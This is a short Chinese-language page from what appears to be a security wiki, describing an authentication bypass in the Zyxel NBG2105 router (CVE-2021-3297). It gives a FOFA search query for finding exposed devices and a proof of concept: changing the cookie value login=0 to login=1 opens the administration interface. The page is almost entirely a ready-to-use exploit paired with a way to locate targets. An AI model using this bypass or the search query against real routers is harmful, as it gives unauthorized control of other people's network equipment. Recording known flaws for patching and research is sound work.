Zyxel NBG2105 身份验证绕过(CVE-2021-3297)

FOFA:

app="ZyXEL-NBG2105"

漏洞代码:

http://target/js/util_gw.js

PoC:

Cookie: login=1;
只需要将cookie中login=0 修改为login=1即可直接进入管理界面。

-w595

ref:

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""